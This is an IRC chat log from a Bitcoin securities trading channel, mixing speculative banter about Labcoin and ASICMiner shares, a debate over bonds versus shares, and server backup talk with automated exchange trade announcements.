[-] Aug 30 15:58:38 it's up 270 and you could sell it for 270 roi Aug 30 15:58:55 maybe you need another cup of coffee? :) Aug 30 16:02:47 of you calculated percentage gain starting from zero, then what is 1? is it 1%? 100%? 100000000% or infinity? Aug 30 16:03:26 when you talk about how much a stock is "Up" or down "down" you dont talk about the ROI Aug 30 16:03:38 as far as i know at least Aug 30 16:03:42 no Aug 30 16:04:04 you are also referring to a reference point Aug 30 16:04:12 which in this case would be IPO price Aug 30 16:05:46 hm ok maybe i do need that coffee then Aug 30 16:10:49 What was Apple's ipo price minus inflation? Aug 30 16:11:36 depends what inflation figure you want, the official one or the actual ? Aug 30 16:13:13 how about actual Aug 30 16:13:27 they bigger than ipo? Aug 30 16:15:01 [BTCTC] [DMS.SELLING] 57 @ 0.01284 = 0.7319 BTC [+] Aug 30 16:16:35 Gecko this is the first time I've seen you sober in sometime, or at least you appear so Aug 30 16:17:09 lol Aug 30 16:17:17 well we play hard, drink hard Aug 30 16:17:20 right? Aug 30 16:17:32 very true Aug 30 16:18:03 [BTCTC] [DMS.PURCHASE] 72 @ 0.01594 = 1.1477 BTC [-] Aug 30 16:18:52 Lol :D. Aug 30 16:19:22 How do you know he's sober? Aug 30 16:19:35 he's not typing angerly Aug 30 16:20:04 haha Aug 30 16:20:36 If I could while drunk on whisky, I would be in the same place too. Aug 30 16:20:42 could type* Aug 30 16:20:49 i guess it's good to have a personal shrink ini the trading room Aug 30 16:20:49 I can't type while sober :( Aug 30 16:21:47 :D Aug 30 16:22:24 now c'mon ppl, when ur sitting on 270% profit you take it Aug 30 16:22:32 sell those fucking labcoin shares to the ground Aug 30 16:22:38 gecko_x2: I agree Aug 30 16:22:45 shush your mouth, this isn't the forums Aug 30 16:22:51 gecko_x2: I'm waiting for another quick 270% Aug 30 16:23:00 so is everyone else Aug 30 16:23:26 supposedly they start hashing next week Aug 30 16:23:36 6T or something Aug 30 16:23:42 supposedly Aug 30 16:23:43 4 Aug 30 16:23:46 Rulother: Nah in 2 weeks, 10th sept Aug 30 16:23:57 and like gecko_x2 said only 4TH Aug 30 16:23:57 I thought they said in the first week of sept? Aug 30 16:23:59 SELL SELL SELL Aug 30 16:24:12 hmm Aug 30 16:24:18 I read somewhere 10 sept Aug 30 16:24:20 might be wrong Aug 30 16:24:23 [BTCTC] [ASICMINER-PT] 1 @ 2.619 BTC [+] Aug 30 16:24:32 don't feel like browing through all those posts Aug 30 16:24:37 *browsing Aug 30 16:24:41 do they even have chips? Aug 30 16:24:53 they do Aug 30 16:25:03 but they never mentioned how large the batch was Aug 30 16:25:07 2000 or 2500? Aug 30 16:25:18 and we don't know how many they will sell Aug 30 16:25:47 I don't mean ordered chips, I mean chips in hand Aug 30 16:25:58 yea they got their batch Aug 30 16:26:09 If they aren't on time with the start of mining expect the selloff of a lifetime Aug 30 16:26:29 lower then IPO prolly Aug 30 16:26:57 well all of those newcomers are worth less than their ipo price Aug 30 16:27:26 still http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/ might be a Yes? :o Aug 30 16:27:40 [MPEX] [S.MPOE] 3775 @ 0.00087029 = 3.2853 BTC [+] Aug 30 16:27:45 err Aug 30 16:27:50 my numbers were wrong Aug 30 16:27:52 "The first run will yeild 1000-1500 chips " Aug 30 16:28:00 from the prospectus Aug 30 16:28:09 but they never said how many it actually was Aug 30 16:28:58 If they start hashing I wouldn't be surprised if Labcoin would be up to .01 Aug 30 16:29:06 that's still a nice increase at current prices Aug 30 16:29:41 !return 0.0037 0.01 Aug 30 16:30:04 it was from another chan Aug 30 16:30:05 bleh, bot doesn't like me? Aug 30 16:30:10 Ahhh :D. Aug 30 16:30:29 [16:30:15] !return 0.0037 0.01 Aug 30 16:30:29 [16:30:16] 170.27% Aug 30 16:31:33 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Aug 30 16:31:35 [HAVELOCK] [XBOND] 13 @ 0.0011 = 0.0143 BTC [-] Aug 30 16:31:49 another option is to buy AM just before Labcoin is supposed to start mining Aug 30 16:32:00 I'll go with the massive sellof expectation Aug 30 16:32:03 if they are delayed -> big selloff -> BTC going into AM Aug 30 16:32:19 [HAVELOCK] [XBOND] 1 @ 0.00106 BTC [-] Aug 30 16:32:37 [HAVELOCK] [AM100] 1 @ 0.026 BTC [-] Aug 30 16:32:40 [HAVELOCK] [AM1] 2 @ 2.84 = 5.68 BTC [+] Aug 30 16:32:50 [HAVELOCK] [XBOND] 9 @ 0.00106 = 0.0095 BTC [-] Aug 30 16:33:08 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [-] Aug 30 16:33:09 [BTCTC] [ASICMINER-PT] 2 @ 2.52 = 5.04 BTC [-] Aug 30 16:33:11 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 16:33:12 [BTCTC] [ASICMINER-PT] 2 @ 2.505 = 5.01 BTC [-] Aug 30 16:33:13 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Aug 30 16:33:14 [BTCTC] [ASICMINER-PT] 7 @ 2.501 = 17.507 BTC [-] Aug 30 16:33:15 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] Aug 30 16:33:17 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 30 16:33:18 [HAVELOCK] [XBOND] 10 @ 0.00105504 = 0.0106 BTC [-] Aug 30 16:33:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 30 16:33:32 [HAVELOCK] [XBOND] 1 @ 0.00105504 BTC [-] Aug 30 16:33:47 I expect a lot of massive sell offs for no god damn good reason, especially when you're talking about Labcoin Aug 30 16:34:20 [HAVELOCK] [XBOND] 20 @ 0.00105504 = 0.0211 BTC [-] Aug 30 16:34:23 But I do plan on being up for 24-48hrs during the period that it starts hashing Aug 30 16:34:27 [HAVELOCK] [AM100] 2 @ 0.026 = 0.052 BTC [-] Aug 30 16:34:28 Well a good reason is the lack of patient "investors", most people in it are only in it for the huge profit spikes. Aug 30 16:35:03 Yes there's those Aug 30 16:35:59 And you gotta admit, Labcoin is a daytraders dream. Aug 30 16:36:02 a good daytrader that is :D. Aug 30 16:36:25 It is Aug 30 16:36:49 I believe it has also caused my drinking and smoking to up by like 3x Aug 30 16:36:58 Haha Aug 30 16:38:07 if Labcoin drops to 2.8 this weekend Aug 30 16:38:12 I'll buy a couple K more. Aug 30 16:38:28 you mean .0028? Aug 30 16:38:33 otherwise I'm not sure if I'll have the courage to hold till mining. Aug 30 16:38:37 yes sorry .0028 Aug 30 16:38:38 [HAVELOCK] [LABCO] 4 @ 0.003285 = 0.0131 BTC [+] Aug 30 16:38:45 I'll keep investing and dedicating time in private and sound projects. Aug 30 16:39:07 That too Aug 30 16:39:10 Namworld: Hah, Yeah that's easy, but how do you get into private and sound projects? :D. Aug 30 16:39:37 Connections and helping around? Aug 30 16:39:45 It gets you noticed. Aug 30 16:40:08 hope you don't mean private and sound like BFL ;). Aug 30 16:41:14 Namworld: Must be great to get into private opportunities. Aug 30 16:45:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.02619 BTC [+] Aug 30 16:45:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0262 BTC [+] Aug 30 16:45:32 [MPEX] [S.MPOE] 35300 @ 0.00086826 = 30.6496 BTC [-] Aug 30 16:46:35 What's up with MPEX Aug 30 16:46:46 so it's an exchange where the only stock traded is the exchange Aug 30 16:46:50 [BTCTC] [LABCOIN] 18 @ 0.003771 = 0.0679 BTC [+] Aug 30 16:46:50 What The? Aug 30 16:48:47 [HAVELOCK] [CFIG] 8 @ 0.16 = 1.28 BTC [-] Aug 30 16:48:56 well there's always this http://i.imgur.com/g61tEF4.jpg Aug 30 16:51:48 [HAVELOCK] [AM1] 1 @ 2.62 BTC [-] Aug 30 16:51:50 [HAVELOCK] [AM1] 1 @ 2.6148 BTC [-] Aug 30 16:51:52 [HAVELOCK] [AM1] 10 @ 2.6 = 26 BTC [-] Aug 30 16:53:18 [BTCTC] [LABCOIN] 313 @ 0.003762 = 1.1775 BTC [-] Aug 30 16:53:20 [BTCTC] [LABCOIN] 86 @ 0.003764 = 0.3237 BTC [+] Aug 30 16:53:21 [BTCTC] [LABCOIN] 20 @ 0.00377 = 0.0754 BTC [+] Aug 30 16:53:22 [BTCTC] [LABCOIN] 75 @ 0.003776 = 0.2832 BTC [+] Aug 30 16:53:23 [BTCTC] [LABCOIN] 25 @ 0.003795 = 0.0949 BTC [+] Aug 30 16:53:24 [BTCTC] [LABCOIN] 103 @ 0.003796 = 0.391 BTC [+] Aug 30 16:54:06 [BTCTC] [LABCOIN] 313 @ 0.003796 = 1.1881 BTC [+] Aug 30 16:55:16 [BTCTC] [LABCOIN] 225 @ 0.003796 = 0.8541 BTC [+] Aug 30 16:56:38 [BTCTC] [LABCOIN] 1 @ 0.003796 BTC [+] Aug 30 16:57:06 Not BFL. But technically, it's sound in the sense it keeps making sales despite awful customer services =P Aug 30 16:57:06 http://blockchain.info/charts/hash-rate Aug 30 16:57:11 Bitcoin Hash Rate Aug 30 16:57:13 trallalaa.. Aug 30 16:57:26 everything is fine, nothing to see :) Aug 30 17:00:18 bitcoin.sipa.be is more precise Aug 30 17:00:24 [HAVELOCK] [AM100] 10 @ 0.0259 = 0.259 BTC [-] Aug 30 17:00:25 oh, 2.5% daily? Aug 30 17:00:37 [HAVELOCK] [LABCO] 50 @ 0.003285 = 0.1643 BTC [+] Aug 30 17:01:07 [HAVELOCK] [LABCO] 1 @ 0.003285 BTC [+] Aug 30 17:02:54 [HAVELOCK] [AM100] 1 @ 0.0259 BTC [-] Aug 30 17:03:08 [HAVELOCK] [LABCO] 2 @ 0.003285 = 0.0066 BTC [+] Aug 30 17:05:34 [HAVELOCK] [XBOND] 1 @ 0.00124 BTC [+] Aug 30 17:09:50 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [+] Aug 30 17:12:07 [HAVELOCK] [CFIG] 2 @ 0.158 = 0.316 BTC [-] Aug 30 17:12:18 [HAVELOCK] [CFIG] 1 @ 0.156 BTC [-] Aug 30 17:12:22 turns out XBOND is more lucrative for me than stocks Aug 30 17:12:24 [HAVELOCK] [CFIG] 1 @ 0.155 BTC [-] Aug 30 17:12:52 [HAVELOCK] [CFIG] 9 @ 0.155 = 1.395 BTC [-] Aug 30 17:13:04 [BTCTC] [TAT.ASICMINER] 16 @ 0.0258 = 0.4128 BTC [-] Aug 30 17:13:36 in small volumes, it does pretty good Aug 30 17:14:01 [BTCTC] [LABCOIN] 5 @ 0.003795 = 0.019 BTC [-] Aug 30 17:15:28 Markets pretty boring today Aug 30 17:17:10 yes. I deal with small volumes only :( :) Aug 30 17:17:39 I can say bitcoin made me 4 times richer, but I still am poor Aug 30 17:18:03 [MPEX] [S.MPOE] 16800 @ 0.00087029 = 14.6209 BTC [+] Aug 30 17:20:43 "It's unfortunate that there are few bonds around (the ones out there are all sold out). It pretty much shows how full of shit all these new mining/ASIC companies are - although they'll happily predict huge profits for investors they won't put their money where their mouth is and raise their capital via loan/bond paying a fixed-rate. Despite the fact that if they're right about the Aug 30 17:20:43 profits they'd make a lot more doing it that way. There's a reason people who can actually make a decent profit offer bonds/loans rather than equity. And there's a reason those who can't make a decent profit always sell shares. At present there's not enough of the former and too many of the latter." Aug 30 17:20:50 Good ole Deprived Aug 30 17:21:20 oh, never thought of it that way Aug 30 17:22:16 would there be a way to do both? obviously founders would not want to take that much risk Aug 30 17:22:40 also, why doesn't Deprived come here? :) Aug 30 17:22:50 i tried to get him here Aug 30 17:22:58 I suspect he lurks Aug 30 17:23:07 he does have a point. Aug 30 17:23:42 the coincidence being I am in the very process of trying to convince a new mining co that there are other ways to raise money Aug 30 17:23:44 and for the record, lurking here is a lot more adequate than talking for the needs of most people. Aug 30 17:23:49 and yet they press for selling shares... Aug 30 17:24:04 ThickAsThieves well mayben they know something you don't. Aug 30 17:24:10 maybe Aug 30 17:25:04 ThickAsThieves: It's pretty simple actually, bonds introduce some risk that shares don't have. Aug 30 17:25:13 lol Aug 30 17:25:21 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [+] Aug 30 17:25:21 turds Aug 30 17:25:22 the risk of default? Aug 30 17:25:29 enlighten me Aug 30 17:25:46 but if the company defaults, wouldn't shares go to zero in the same situation anyway? Aug 30 17:26:08 pankkake you don't understand investor mentality you heretic you. Aug 30 17:26:52 bonds introduce the risk that they can't conceivably go up 548906809560954860958x Aug 30 17:27:05 unless they come from me Aug 30 17:27:09 hahaha Aug 30 17:27:12 :) Aug 30 17:27:13 gecko_gs2 San1ty and co : have i put enough digits in there to make you rich or need more ? Aug 30 17:27:34 pankkake as they can't go up enough to make ten dollar tom "oprah rich", they're not "Worth it". Aug 30 17:27:50 very very bad lottery tickets these bonds. Aug 30 17:28:06 some good lols provided by Van Cleef (BitHub) https://bitcointalk.org/index.php?topic=222565.msg3041247#msg3041247 Aug 30 17:28:43 I now realize that watching stock prices for what I have is not really "worth it" Aug 30 17:29:03 in time wasted Aug 30 17:29:10 that's a point i try making to smalltimers Aug 30 17:29:17 they ask what should i buy?! Aug 30 17:29:20 i say nothing Aug 30 17:29:21 but Aug 30 17:29:27 well that's the bane of the amateur invesotr anyway. but if you are using that time to eduicate youirself its not really a waste. Aug 30 17:29:28 mircea_popescu: I'm talking about risk for the issuer obviously. If you manage to sell all your bonds, you promise (unless you are a scam) to pay a steady low fee to pay off your loan. When selling shares you just sell that... shares. No risk for the issuer whatsoever. Aug 30 17:29:28 if you must, buy some bonds Aug 30 17:29:52 lol Aug 30 17:29:54 well, I learned a lot about how trading works. and futures, stuff Aug 30 17:29:54 San1ty i just used your conveniently open ended statement to make a point. Aug 30 17:30:01 it certainly was interesting Aug 30 17:30:09 LOL - Bithub to Jmutch (SANDSTORM): "yeh yeh, can you just tell me how shit my stock is doing please?" Aug 30 17:30:25 San1ty, you realize selling shares is also a commitment to profit, no? Aug 30 17:30:32 what's sandstorm again, a fund right ? Aug 30 17:30:36 yeah Aug 30 17:30:43 the guy who believes and feels Aug 30 17:30:46 so if it's a fund why hate on it, is the portofolio that bad ? Aug 30 17:30:46 A blackhole. Aug 30 17:31:03 or wait. the portofolio is undisclosed ? Aug 30 17:31:10 he discloses I think Aug 30 17:31:21 he kinda was born under a bad sign Aug 30 17:31:23 so what's he holding ? all the gems ? Aug 30 17:31:28 ThickAsThieves: Correct, I'm trying to have an open discussion here (hope I haven't offended anyone? :S). But the premise of shares and bonds are different. Aug 30 17:31:33 it was the IPO for 100btc Aug 30 17:31:37 that skyrocketed Aug 30 17:31:41 yeah Aug 30 17:31:46 i recall the guy vaguely. Aug 30 17:32:03 just, by now there's so many of these indistinguishable things that im always loath i confuse joe for schmoe. Aug 30 17:32:03 Assets Aug 30 17:32:04 10 ASICminer direct shares (2.5) Aug 30 17:32:04 6 ASICminer-PT shares (2.48) Aug 30 17:32:04 4 ASICminer-PT shares(4.19) Aug 30 17:32:04 4 ASICminer-PT shares(3.81) Aug 30 17:32:04 1 ASICminer-PT shares(3.15) Aug 30 17:32:05 1000 Labcoin Shares(.001) Aug 30 17:32:05 10 Cognitive Shares (.28) Aug 30 17:32:06 100 RentalStarter shares (.0149) Aug 30 17:32:06 15 bASIC shares (.27) Aug 30 17:32:06 15 bASIC shares (.41) Aug 30 17:32:07 3000 Active Miner shares (.0025) Aug 30 17:32:08 2000 Active Miner shares (.0052) Aug 30 17:32:08 9.98 BTC Aug 30 17:32:15 [BTCTC] [LABCOIN] 26 @ 0.003753 = 0.0976 BTC [-] Aug 30 17:32:16 last report shows 150 BTC NAV Aug 30 17:32:33 wait what ?! that adds up to about 15 btc. Aug 30 17:32:35 not sure whas going on with his valuation Aug 30 17:32:51 or wtf is that ?! Aug 30 17:33:10 what's the relation between 6 and 2.48 / 4 and 4.19 / 4 and 3.81 ?! Aug 30 17:33:11 https://docs.google.com/spreadsheet/ccc?key=0AhkfI_u94nYydFRIaTlBNE14aHBZNzIxRlBLWlhzTlE#gid=2 Aug 30 17:33:15 Welcome to Google Docs Aug 30 17:33:16 qty Aug 30 17:33:18 ty ozbot Aug 30 17:33:22 on diff exchanges Aug 30 17:33:30 [HAVELOCK] [SDSTM] 4 @ 0.004 = 0.016 BTC [-] Aug 30 17:33:33 [HAVELOCK] [SDSTM] 3 @ 0.00396441 = 0.0119 BTC [-] Aug 30 17:33:34 why is this guy not on an0 ;/ Aug 30 17:33:34 [HAVELOCK] [SDSTM] 5 @ 0.00335 = 0.0168 BTC [-] Aug 30 17:33:36 [HAVELOCK] [SDSTM] 75 @ 0.00330002 = 0.2475 BTC [-] Aug 30 17:33:38 [HAVELOCK] [SDSTM] 1 @ 0.00330001 BTC [-] Aug 30 17:33:40 who is? Aug 30 17:33:40 [HAVELOCK] [SDSTM] 2 @ 0.0033 = 0.0066 BTC [-] Aug 30 17:33:41 fucking blessings of ignorance already. Aug 30 17:33:42 [HAVELOCK] [SDSTM] 1 @ 0.0033 BTC [-] Aug 30 17:33:44 [HAVELOCK] [SDSTM] 5 @ 0.0031 = 0.0155 BTC [-] Aug 30 17:33:46 [HAVELOCK] [SDSTM] 1 @ 0.00306201 BTC [-] Aug 30 17:33:48 [HAVELOCK] [SDSTM] 10 @ 0.00303001 = 0.0303 BTC [-] Aug 30 17:33:50 [HAVELOCK] [SDSTM] 54 @ 0.00301 = 0.1625 BTC [-] Aug 30 17:33:52 [HAVELOCK] [SDSTM] 50 @ 0.003 = 0.15 BTC [-] Aug 30 17:33:53 ThickAsThieves everyone that can be fucking made sense out of you know ? Aug 30 17:33:53 [HAVELOCK] [SDSTM] 489 @ 0.003 = 1.467 BTC [-] Aug 30 17:33:55 [BTCTC] [TAT.ASICMINER] 50 @ 0.0258 = 1.29 BTC [-] Aug 30 17:34:03 those exist? Aug 30 17:34:04 ThickAsThieves, mircea_popescu: Shares is a commitment to profit, but bonds are basically a loan. Shares are a variable cost for you for example dividends. But a bond is a steady cost. Aug 30 17:34:14 That's some weak shit Aug 30 17:34:14 how am i to read that shit ;/ Aug 30 17:34:18 Deprived isnt using it fwiw Aug 30 17:34:20 .d Aug 30 17:34:20 65750060.14908 | Next Diff in 970 blocks | Estimated Change: 20.5653% in 5d 8h 18m 16s Aug 30 17:34:29 ThickAsThieves fgor shame. Aug 30 17:34:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008724 BTC [+] Aug 30 17:34:38 San1ty yea, i am aware what these are. Aug 30 17:35:15 So IMHO, a bond as an issuer is more risk then just selling BS Shares. Aug 30 17:35:20 here's deprived's fund thread if you wanna sick the girl on him https://bitcointalk.org/index.php?topic=112876.0 Aug 30 17:35:29 mircea_popescu: "dont tell me what a fucking bond is, i'm not 5" Aug 30 17:35:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008724 BTC [+] Aug 30 17:35:37 lol Aug 30 17:35:58 :D. Aug 30 17:35:58 BS = bullshit? Aug 30 17:36:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008724 BTC [+] Aug 30 17:36:08 A lot of people here are 5 though... Aug 30 17:36:12 yeah bullshit Aug 30 17:36:13 if so, then that was our point from the start Aug 30 17:36:24 well, deprived's point Aug 30 17:36:27 well I wasn't disagreeing with you point Aug 30 17:36:32 I was saying why would an issuer go for a bond? Aug 30 17:36:37 If they can get away with shares Aug 30 17:36:48 oh you worded it like you had a point Aug 30 17:36:55 Oh I'm sorry then Aug 30 17:36:59 Deprivrd should roll DMS into a diff futures pricing system Aug 30 17:36:59 np! Aug 30 17:37:00 lmao Aug 30 17:37:19 whats so funny mp? Aug 30 17:37:26 anyway, the reason an issuer would to the right thing is because he's not a fucking leech, trying to buy a car off paying lip service to the internet thing. Aug 30 17:37:43 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Aug 30 17:37:45 BRB 5 minutes Aug 30 17:38:07 while it's true that most people involved are 5, what bothers me the most is that most are 5 while simultaneously working on the mentality of your average street whore. Aug 30 17:38:22 how the hell that works boggles my mind. Aug 30 17:38:44 Tom Ford Aug 30 17:38:50 [BTCTC] [TAT.VIRTUALMINE] 96 @ 0.0008713 = 0.0836 BTC [-] Aug 30 17:38:51 thats how it works Aug 30 17:38:52 [BTCTC] [TAT.VIRTUALMINE] 904 @ 0.0008723 = 0.7886 BTC [+] Aug 30 17:38:59 ;;google Tom Ford Aug 30 17:39:00 Tom Ford: ; Tom Ford - Wikipedia, the free encyclopedia: ; Tom Ford - Women's - Handbags - Neiman Marcus: Aug 30 17:39:02 i guess. Aug 30 17:39:22 how bout that eulora update :( Aug 30 17:39:29 do we just have to wait till oct? Aug 30 17:39:34 probably. Aug 30 17:39:47 i blame raid Aug 30 17:39:50 nobody fucking steals from me it seems. which, you know, nice of you people. Aug 30 17:39:58 thestringpuller i blame java. Aug 30 17:40:30 you have me 10k credits for a few bitcents Aug 30 17:40:30 fucking raid array was run off a jre. i say "dude, no java, srsly". sysadmin is like "ya ya, we're professionals here, i've been a sysadmin since before yo uwere born kiddo" Aug 30 17:40:49 stealing from you seems really distasteful Aug 30 17:41:06 lololol Aug 30 17:41:12 jre for raid?!?!?!? Aug 30 17:41:15 thestringpuller anyway, im trying to piece it together. Aug 30 17:41:18 where is mod6 Aug 30 17:41:22 hahhaha Aug 30 17:41:28 yes, apparently that's a thing now. Aug 30 17:41:30 java is the optimal language for any raid solution Aug 30 17:41:40 ...... Aug 30 17:41:43 everyone knows that. Aug 30 17:41:45 not sure if trolling Aug 30 17:41:50 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0008721 = 0.0026 BTC [-] Aug 30 17:41:50 lol Aug 30 17:41:52 or serious Aug 30 17:41:58 yes, trolling :p Aug 30 17:42:05 god damnit Aug 30 17:42:15 personally, I can't stand raids Aug 30 17:42:15 what happened to old school raid bridges? Aug 30 17:42:23 you see ? that crap. Aug 30 17:42:32 always more problems than they are worth in my experience Aug 30 17:42:34 well, now you won't have to Aug 30 17:42:41 gecko_gs2 what about like when it dies in flames and you have to keep a production server offline for 20 hours while you pi8ck up the pieces! Aug 30 17:42:49 now we got btrfs Aug 30 17:43:02 so u can kiss those raid arrays goodbye for good Aug 30 17:43:08 my raid6 saved me more than once Aug 30 17:43:16 well, I have backups, but it would have been annoying Aug 30 17:43:18 mircea_popescu exactly Aug 30 17:43:20 did the entire raid array die or just a few drives in the array? Aug 30 17:43:31 pankkake on the mpex system i have a 1+0 hotswappable work of wonder. Aug 30 17:43:32 mircea_popescu which is why you should run your stuff on btrfs Aug 30 17:43:36 copy on write fs Aug 30 17:43:39 if a hdd pops you just pluck it out and put a new one back in Aug 30 17:43:45 I would hope so Aug 30 17:43:49 then you would have restored your site yesterday in a few seconds Aug 30 17:43:53 and what's the rebuild time? Aug 30 17:43:53 gecko_gs2 it's just a lousy server hostying a buncha blogs. Aug 30 17:43:57 instead of all day Aug 30 17:44:04 pankkake it just does it while running. Aug 30 17:44:05 i would assume if your production server burst into flames you got bigger problems than raod Aug 30 17:44:09 raid* Aug 30 17:44:16 why Aug 30 17:44:22 thestringpuller no, it'd be the raid. Aug 30 17:44:23 ofcourse you have offsite backup Aug 30 17:44:23 mircea_popescu: that's not the question. if other drives die while rebuilding, you're fucked Aug 30 17:44:36 look ppl Aug 30 17:44:41 pankkake only if the symmetrical one dies. Aug 30 17:44:46 yeah Aug 30 17:44:58 but that's why you have to understand how raid works very well Aug 30 17:44:58 just use godaddy, wtf Aug 30 17:44:59 now i have incubus stuck in my head Aug 30 17:45:03 :) Aug 30 17:45:06 ur arguing about shit that doesn't matter in a CoW world Aug 30 17:45:12 ThickAsThieves 3/10 Aug 30 17:46:03 with btrfs making a backup is simply taking a snapshot of the changed data since last backup Aug 30 17:46:11 +1 on looking to re-read the Eulora update :P Aug 30 17:46:19 TomServo didja save it ? Aug 30 17:46:25 the first backup is simply a snapshot of changed bits since zero Aug 30 17:46:42 so a backup of a TB hdd would be about 500 GB Aug 30 17:46:58 subsequential backups a fraction of that Aug 30 17:47:07 a few seconds to take the snapshot Aug 30 17:47:18 a few seconds to transfer off site Aug 30 17:47:23 yeah, and if that chain is 10`000 units long you go make a miner to rebuild from scratch Aug 30 17:47:24 a few seconds to restore Aug 30 17:47:28 mircea_popescu: sorry, I looked when you were asking yesterday. No joy. Aug 30 17:47:53 TomServo well luckily i keep slaves, they all read my shit, i had everyone re-write it from memory under pain of lashing. Aug 30 17:48:01 haha Aug 30 17:48:04 ill confront 4 variants and hopefully remember the rest. Aug 30 17:48:06 so mebbe. Aug 30 17:48:19 it was about 10x easier to write than it is to re-write. Aug 30 17:49:21 and since we're on java : http://www.dailymail.co.uk/news/article-2348977/Veteran-sheriffs-deputy-arrested-tipping-bikini-baristas-police-raids-notorious-Java-Juggs-espresso-stands-exchange-sex.html Aug 30 17:49:59 [MPEX] [S.BBET] 4400 @ 0.00069999 = 3.08 BTC [-] Aug 30 17:51:39 ThickAsThieves: Maybe a Derp question, but what happens with your assets if Havelock would have an irrecoverable DB crash? Aug 30 17:53:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.02464 = 0.2464 BTC [-] Aug 30 17:53:10 [BTCTC] [TAT.ASICMINER] 50 @ 0.02463 = 1.2315 BTC [-] Aug 30 17:53:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02457 = 0.0491 BTC [-] Aug 30 17:53:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02454 = 0.0491 BTC [-] Aug 30 17:53:14 [MPEX] [S.MPOE] 7522 @ 0.00086826 = 6.5311 BTC [-] Aug 30 17:53:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02453 = 0.2453 BTC [-] Aug 30 17:53:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.02451 = 0.1471 BTC [-] Aug 30 17:53:16 [BTCTC] [TAT.ASICMINER] 22 @ 0.0245 = 0.539 BTC [-] Aug 30 17:53:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.0245 = 0.245 BTC [-] Aug 30 17:53:18 [BTCTC] [TAT.ASICMINER] 16 @ 0.02433 = 0.3893 BTC [-] Aug 30 17:53:19 [BTCTC] [TAT.ASICMINER] 80 @ 0.02432 = 1.9456 BTC [-] Aug 30 17:53:20 [BTCTC] [TAT.ASICMINER] 8 @ 0.02431 = 0.1945 BTC [-] Aug 30 17:53:22 [BTCTC] [TAT.ASICMINER] 40 @ 0.0243 = 0.972 BTC [-] Aug 30 17:53:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.02412 = 0.0965 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.02411 = 0.4822 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0241 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02404 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.02403 = 0.1202 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.02402 = 0.048 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 53 @ 0.02402 = 1.2731 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.02401 = 0.1201 BTC [-] Aug 30 17:53:30 [BTCTC] [TAT.ASICMINER] 55 @ 0.02401 = 1.3206 BTC [-] Aug 30 17:53:47 [BTCTC] [LABCOIN] 20 @ 0.003721 = 0.0744 BTC [-] Aug 30 17:53:49 [BTCTC] [LABCOIN] 1 @ 0.003721 BTC [-] Aug 30 17:53:50 [BTCTC] [LABCOIN] 100 @ 0.00372 = 0.372 BTC [-] Aug 30 17:53:50 [BTCTC] [LABCOIN] 138 @ 0.003711 = 0.5121 BTC [-] Aug 30 17:54:43 [BTCTC] [LABCOIN] 246 @ 0.003711 = 0.9129 BTC [-] Aug 30 17:55:45 ThickAsThieves: Maybe a Derp question, but what happens with your assets if Havelock would have an irrecoverable DB crash? <<< there are backups Aug 30 17:56:06 (of the asset holder emails and Qty) Aug 30 17:56:18 wait there may be hope Aug 30 17:56:27 I think I may have the article in my netbook Aug 30 17:56:30 brb Aug 30 17:57:14 [BTCTC] [ACTIVEMINING] 403 @ 0.004671 = 1.8824 BTC [+] Aug 30 17:57:15 [BTCTC] [ACTIVEMINING] 100 @ 0.004674 = 0.4674 BTC [+] Aug 30 17:57:16 [BTCTC] [ACTIVEMINING] 50 @ 0.004675 = 0.2338 BTC [+] Aug 30 17:57:17 [BTCTC] [ACTIVEMINING] 159 @ 0.004692 = 0.746 BTC [+] Aug 30 17:57:19 [BTCTC] [ACTIVEMINING] 650 @ 0.0047 = 3.055 BTC [+] Aug 30 17:57:20 [BTCTC] [ACTIVEMINING] 210 @ 0.00475 = 0.9975 BTC [+] Aug 30 17:57:21 [BTCTC] [ACTIVEMINING] 989 @ 0.00477 = 4.7175 BTC [+] Aug 30 17:57:22 [BTCTC] [ACTIVEMINING] 48 @ 0.004777 = 0.2293 BTC [+] Aug 30 17:57:23 [BTCTC] [ACTIVEMINING] 52 @ 0.00479 = 0.2491 BTC [+] Aug 30 17:58:02 mircea popescu you are in luck Aug 30 17:58:05 i have the raw data Aug 30 17:58:08 you want? Aug 30 17:58:47 PARDON ME WHILE I BURST INTO FLAMES Aug 30 17:58:48 fucking incubus Aug 30 17:59:00 ThickAsThieves: Thanks for confirming :). Aug 30 17:59:26 thestringpuller please, email. Aug 30 17:59:32 bless you! Aug 30 17:59:48 mp you're being called upon - https://bitcointalk.org/index.php?topic=263445.msg3042898#msg3042898 Aug 30 18:00:07 k i'll email the html page Aug 30 18:00:14 can you work with that? Aug 30 18:00:23 perfect. Aug 30 18:00:37 awwww yea. Aug 30 